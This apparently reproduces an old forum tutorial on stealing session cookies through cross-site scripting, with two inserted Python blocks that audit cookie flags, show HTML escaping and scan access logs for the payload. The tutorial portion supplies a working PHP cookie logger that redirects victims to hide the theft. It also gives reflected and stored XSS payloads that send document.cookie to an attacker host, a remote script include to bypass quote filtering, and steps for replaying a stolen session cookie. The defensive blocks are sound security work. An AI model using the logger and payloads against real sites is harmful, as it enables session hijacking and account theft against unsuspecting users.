1.) This tutorial is the sequel to my cross-site scripting one. If you do not have any knowledge of XSS, then I suggest reading that tutorial first and then coming back to this one.
So what the hell is a cookie and what do they do?
Cookies are little text files created by your browser to remember things. Common uses are to remember usernames, passwords, session ID’s, and site preferences. After you login to a website, a cookie is stored on your computer so that every time you go to a different page on that site, you don’t have to re-authenticate yourself.
You can easily view the cookies a website has stored on your computer by visiting the site and typing this in the URL bar:
javascript:alert(document.cookie);
This will give you a pop-up box and display the cookies saved for that site.
What’s so good about stealing someone’s cookies?
If you get a hold of someone else’s cookies and replace yours with them, your stored username/password combo or session ID becomes the same as your victim’s, therefore authenticating you on a website as someone else (the victim), without having to know their password. On to the fun part:
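The paragraphs above explain why a session cookie readable from document.cookie is worth stealing. The flags a site sets on its cookies decide whether script can read them at all, so here is an added example (written for this thread, not the original poster's code) that parses Set-Cookie headers, reports the missing HttpOnly/Secure/SameSite flags, and simulates what document.cookie would return for a given set of cookies. The sample headers are constructed; the first one mirrors the thread's unprotected "sessionID=123" cookie.

```python
"""Audit Set-Cookie headers for the flags that limit what an XSS payload
can do with a session cookie. Added example for this thread, not the
original poster's code; the sample headers below are constructed."""


def parse_set_cookie(header):
    """Split one Set-Cookie header into (name, value, attributes).

    Attribute names are lower-cased; flag attributes with no value
    (Secure, HttpOnly) are stored as True.
    """
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for attr in parts[1:]:
        if not attr:
            continue
        key, _, val = attr.partition("=")
        attrs[key.strip().lower()] = val.strip() or True
    return name.strip(), value.strip(), attrs


def audit_cookie(header):
    """Return a list of findings for a single Set-Cookie header.

    HttpOnly is the flag that matters for the cookie-theft scenario in
    this thread: a cookie carrying it is sent with requests but is not
    exposed through document.cookie, so the alert()/void() tricks and
    the cookielog.php exfiltration never see it.
    """
    _name, _value, attrs = parse_set_cookie(header)
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable via document.cookie")
    if "secure" not in attrs:
        findings.append("missing Secure: also sent over plain HTTP")
    samesite = attrs.get("samesite")
    if samesite is True or samesite is None or \
            str(samesite).lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict: attached to cross-site requests")
    return findings


def visible_to_script(headers):
    """Simulate document.cookie for a set of Set-Cookie headers: only the
    cookies without HttpOnly are returned, joined the way browsers do."""
    visible = []
    for header in headers:
        name, value, attrs = parse_set_cookie(header)
        if "httponly" not in attrs:
            visible.append(f"{name}={value}")
    return "; ".join(visible)


# Constructed sample headers (assumed values, not from any real site).
SAMPLE_HEADERS = [
    "sessionID=123; Path=/",                                   # like the thread's example
    "sessionID=123; Path=/; Secure; HttpOnly; SameSite=Strict",  # hardened form
    "theme=dark; Path=/; SameSite=Lax",                        # preference, not a credential
]

if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        print(header)
        for finding in audit_cookie(header) or ["ok"]:
            print("  -", finding)
    print("document.cookie would show:", visible_to_script(SAMPLE_HEADERS))
```

Run it as a script to see the report; the hardened header produces no findings, and document.cookie would show only the unprotected sessionID and the theme cookie. HttpOnly does not fix the XSS itself, it only removes the cookie from what the injected script can read, so it belongs alongside output escaping, not instead of it.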
2.) To successfully steal someone’s cookies you need 3 things: a webhost that supports PHP, a PHP script that logs the cookies, and an XSS vulnerability. If you don’t have a webhost, find a free hosting company that supports PHP and sign up. If you don’t know how to find an XSS vulnerability, read my previous tutorial and learn. But if you don’t have a cookie-logging script, I will supply you with one!
The cookie logger:
cookielog.php
<?php
$cookie = $_GET['cookie'];
$referer = $_SERVER['HTTP_REFERER'];
$date = date('l jS \of F Y h:i:s A');
$info = "Cookie: $cookie \n Referrer: $referer \n $date";
$log = "cookie.txt";
$f = fopen($log, 'a');
fwrite($f, $info);
fclose($f);
header("Location: http://www.somesite.com");
?>
This script will log the victim’s cookies, tell you where they came from and when it happened – to a file called cookie.txt. It then redirects them somewhere else so that they do not find your site, and don’t know what happened. It’s good to know the referrer of your victim because if they’re an admin and have the admin section hidden well, you now have a better chance of finding it.
(Note: make sure you create a file called cookie.txt and make it writeable)
3.) Now the only thing left to do is to get that script to run in your victim’s browser.
If you found a Non-persistent XSS hole, then you’re going to have to get your victim to click on a link that looks similar to:
www.website.com/index.php?title=xss"><script>document.location="yoursite.com/cookielog.php?cookie="+document.cookie</script>
Or
www.website.com/index.php?title=xss"><script>window.location="yoursite.com/cookielog.php?cookie="+document.cookie</script>
If you found a persistent XSS hole then your job is easy, place your script where you found the hole and just get someone to view that page!
<script>document.location="yoursite.com/cookielog.php?cookie="+document.cookie</script>
Or
<script>window.location="yoursite.com/cookielog.php?cookie="+document.cookie</script>
If the website has some security and won’t let you use quotes, host your script on your server and inject another script to call the remote one.
<script src=http://www.yoursite.com/script.js></script>
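The injection steps above all rely on index.php echoing the title parameter straight back into the page. As an added example for this thread (not the poster's code, and not any real site's index.php), here is the defender's side of that in Python: the same template rendered with and without HTML escaping, fed the thread's own reflected payload, plus a small scanner that pulls requests carrying that payload out of combined-format access logs, decoding the URL repeatedly so a double-encoded copy still surfaces. The log lines and the yoursite.com host are constructed.

```python
"""Defender-side checks for the reflected XSS described in this thread:
escape the echoed parameter, and scan access logs for requests whose
query string carries the cookie-stealing payload. Added example, not the
poster's code; all sample data is constructed."""
import html
import re
from urllib.parse import unquote

# The thread's own reflected payload, used as test input below.
PAYLOAD = ('"><script>document.location="http://yoursite.com/cookielog.php'
           '?cookie="+document.cookie</script>')


def render_title_unsafe(title):
    """The pattern that creates the hole: the parameter is echoed verbatim,
    so the leading quote closes the attribute and the script tag is live."""
    return f'<input type="text" name="title" value="{title}">'


def render_title_safe(title):
    """Same template, but the value is HTML-escaped with quote=True, so the
    browser sees &quot; and &lt;script&gt; as text, never as markup."""
    return f'<input type="text" name="title" value="{html.escape(title, quote=True)}">'


# Tokens that appear in every variant the thread shows (document.cookie,
# a script tag, or a javascript: URL). Case-insensitive on purpose.
SUSPICIOUS = re.compile(r"document\.cookie|<script|javascript:", re.IGNORECASE)

# Apache/nginx combined log format: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def fully_decode(s, rounds=3):
    """URL-decode until the string stops changing (bounded), so that a
    double-encoded %253Cscript%253E still decodes to <script>."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def flag_requests(lines):
    """Return (client ip, decoded request target) for every log line whose
    decoded target matches SUSPICIOUS. Unparseable lines are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = fully_decode(m.group("target"))
        if SUSPICIOUS.search(target):
            hits.append((m.group("ip"), target))
    return hits


# Constructed sample log lines (assumed, not from any real server).
SAMPLE_LOG = [
    '10.0.0.2 - - [12/Mar/2007:10:14:01 +0000] "GET /index.php?title=hello+world HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [12/Mar/2007:10:15:32 +0000] "GET /index.php?title=xss%22%3E%3Cscript%3E'
    'document.location%3D%22http%3A%2F%2Fyoursite.com%2Fcookielog.php%3Fcookie%3D%22%2B'
    'document.cookie%3C%2Fscript%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [12/Mar/2007:10:16:10 +0000] "GET /help.php?q=cookie+policy HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2007:10:17:45 +0000] "GET /index.php?title=%2522%253E%253Cscript%253E'
    'alert(1)%253C%252Fscript%253E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print("unsafe:", render_title_unsafe(PAYLOAD))
    print("safe:  ", render_title_safe(PAYLOAD))
    for ip, target in flag_requests(SAMPLE_LOG):
        print(f"suspicious request from {ip}: {target}")
```

The escaping half is the fix; the scanner is for finding out whether the hole was ever used. The log check only sees the first hop (the victim's browser requesting the vulnerable page), which is the one a site owner can actually observe; the follow-up request to cookielog.php lands in the attacker's logs, not yours.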
That’s all I’ve got; if you have any questions feel free to post ’em here or shoot me an e-mail.
::EDIT::
OH NOEZ I FORGOT TO TELL YOU HOW TO USE TEH COOKIES.
Once you’ve got their cookies, you’ll want to use the javascript:void() command, similar to the javascript:alert(document.cookie) one mentioned earlier. First you need to clear your cookies (to put the new ones in). Then in the URL bar type
javascript:void(document.cookie="cookie=value");alert(document.cookie);
If their cookie is called "sessionID" and it has a value of "123", then you’d type this:
javascript:void(document.cookie="sessionID=123");alert(document.cookie);
When your cookie is alerted, you’ll see the new value. Refresh the page and enjoy your new login.